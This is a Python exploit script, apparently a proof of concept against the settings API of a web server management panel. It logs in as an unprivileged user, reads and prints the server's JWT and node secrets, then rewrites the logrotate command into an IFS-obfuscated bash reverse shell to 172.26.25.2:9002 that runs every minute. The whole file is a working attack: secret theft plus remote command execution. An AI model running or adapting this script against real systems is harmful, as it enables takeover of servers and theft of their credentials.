import requests

def login(login_url, login_data):
    response = requests.post(login_url, json=login_data)
    
    if response.status_code == 200:
        print("Login successful!")
        token = response.json().get("token")
        print("Obtained Token:", token)
        return token
    else:
        print("Login failed with status code:", response.status_code)
        print("Response:", response.text)
        return None

def get_settings(settings_url, token):
    headers = {
        "Authorization": f"{token}",
        "Accept": "application/json",
        "Content-Type": "application/json"
    }
    
    response = requests.get(settings_url, headers=headers)
    
    if response.status_code == 200:
        settings = response.json()
        jwt_secret = settings.get("server", {}).get("jwt_secret")
        node_secret = settings.get("server", {}).get("node_secret")
        
        print("JWT Secret:", jwt_secret)
        print("Node Secret:", node_secret)
        return jwt_secret, node_secret
    
    else:
        print("Failed to retrieve settings with status code:", response.status_code)
        print("Response:", response.text)
        return None

def exploit_settings(settings_url, token, jwt_secret, node_secret):
    headers = {
        "Authorization": f"{token}",
        "Accept": "application/json",
        "Content-Type": "application/json"
    }

    payload = {
        "auth": {
            "ip_white_list": None,
            "ban_threshold_minutes": 10,
            "max_attempts": 10
        },
        "logrotate": {
            "enabled": True,
            "cmd": "bash -c bash${IFS%??}-i${IFS%??}>&${IFS%??}/dev/tcp/172.26.25.2/9002${IFS%??}<&1",  # Command to be executed on Vulnerable Service  
            "interval": 1 # Number of Minutes in which command will execute
        },
        "nginx": {
            "access_log_path": "",
            "error_log_path": "",
            "config_dir": "",
            "pid_path": "",
            "test_config_cmd": "",
            "reload_cmd": "",
            "restart_cmd": ""
        },
        "openai": {
            "base_url": "",
            "token": "",
            "proxy": "",
            "model": ""
        },
        "server": {
            "http_host": "0.0.0.0",
            "http_port": "7080",
            "run_mode": "debug",
            "jwt_secret": f"{jwt_secret}",
            "node_secret": f"{node_secret}",
            "http_challenge_port": "7080",
            "email": "[email protected]",
            "database": "data",
            "start_cmd": "login",
            "ca_dir": "",
            "demo": False,
            "page_size": 10,
            "github_proxy": "",
            "cert_renewal_interval": 7,
            "recursive_nameservers": [],
            "skip_installation": False,
            "insecure_skip_verify": False,
            "name": ""
        }
    }

    response = requests.post(settings_url, json=payload, headers=headers)

    if response.status_code == 200:
        print("Exploit triggered successfully.")
        print("Response:", response.json())
    else:
        print("Exploit failed with status code:", response.status_code)
        print("Response:", response.text)


if __name__ == "__main__":
    login_url = 'http://127.0.0.1:7080/api/login'
    settings_url = 'http://127.0.0.1:7080/api/settings'
    
    login_data = {
        "name": "unauthorized_user",
        "password": "basic"
    }
    
    token = login(login_url, login_data)
    
    if token:
        jwt_secret, node_secret = get_settings(settings_url, token)
        exploit_settings(settings_url, token, jwt_secret, node_secret)